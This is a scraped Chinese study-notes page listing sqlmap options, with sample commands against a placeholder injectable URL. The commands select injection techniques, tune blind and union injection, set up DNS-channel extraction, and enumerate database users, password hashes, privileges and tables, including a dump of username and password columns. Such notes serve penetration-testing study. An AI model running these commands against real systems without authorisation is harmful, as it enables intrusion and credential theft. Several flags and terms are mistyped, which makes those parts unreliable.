Sqlmap参数学习笔记 |
您所在的位置:网站首页 › sql注入盲注时间太长如何加快速度 › Sqlmap参数学习笔记 |
sqlmap --technique 参数用来设置具体SQL注入技术
B: Boolean-based blind 基于布尔的忙逐步 E:Error-based 报错注入 U:Union query-based Union查询注入 S:Stacked queries 堆叠注入 T:Time-based blind 基于时间的盲注 Q:lnline queries 内联查询注入 例如: sqlmap -u “存在注入点的URL" --technique B --current-db #利用基于布尔的盲注对注入点进行SQL注入探测。 1、sqlmap设置时间盲注延迟时间例如: sqlmap -u "存在注入点的URL" --time-sec 3 --current-db 2、sqlmap设置UNION字段数sqlmap -u “存在注入的URL" --union-cols 12-18 --current-db 3、sqlmap设置union查询表sqlmap -u “存在注入的URL" --technique u --union-form users --current-db -v3 4、sqlmap设置DNS攻击定义:通过设置DNS流量来突破限制 --dns-domain "dns服务器" 需要用户自身具有一个开放53端口的DNS服务器,通过DNS流量来获得web应用程序中数据内容。 5、sqlmap设置二次注入sqlmap中可以设置二次注入的结果页面 sqlmap -u "存在注入的URL" --second-order 6、sqlmap识别指纹sqlmap -u "存在注入的URL" --fingerprint -f 探测目标指纹信息(--fingerprint -f) 7、sqlmap检索DBMS Banner获取后端数据库Banner信息 --banner 或者 -b 8、sqlmap检索DBMS当前用户获取DBMS当前用户 --current-user 9、sqlmap检索DBMS当前数据库获取当前数据库名 --current-db 10、sqlmap检索DBMS当前 主机名--hostname 11、sqlmap探测当前用户DBA--is-dba 探测当前用户是否是数据库管理员 12、sqlmap 枚举DBMS用户名--user 获取DBMS所有用户 13、sqlmap枚举DBMS的用户名密码--password 获取用户名密码 mysql -h IP地址 -u root -p #MySQL数据库登录 14、sqlmap枚举DBMS权限--privileges--role(角色) 例如:sqlmap -u "存在注入的URL" --technique -u -v3 --batch --privileges 15、sqlmap列举数据库名--dbs 列举数据库名称 16、sqlmap枚举数据库表--tables 枚举表名 --> 制定具体数据库 -D 数据库名 --exclude-sysdbs 例如:(1)sqlmap -u "存在注入的URL" -D 数据库名 --tables (2)sqlmap -u "存在注入的URL" --tables --exclude-sysdbs 17、sqlmap枚举数据表列--columns -D 指定数据库 -T 指定数据表 -C 指定具体字段 例如:sqlmap -u "存在注入的URL地址" -D 数据库名 -T 用户名 --columns 18、sqlmap枚举数据值--dump 例如:sqlmap -u "存在注入的URL地址" -D 数据库名 -T 表名 -C “username,password" --dump 19、sqlmap枚举schema信息定义:用户可以使用此开关--schema检索DBMS模式。模式列表将所有的数据库、表和列,以及它们各自的类型。与--exclude-sysdb结合使用时,只会检索和显示包含非系统数据库的模式的一部分 例如:sqlmap -u "存在注入的URL地址" --schema--batch --exclude-sysdbs 20、sqlmap检索数据表的数量如果用户只想知道表中的条目数,则可以使用此开关。 --count 例如:sqlmap -u "存在注入的URL地址" --count -D testdb |
今日新闻 |
推荐新闻 |
CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3 |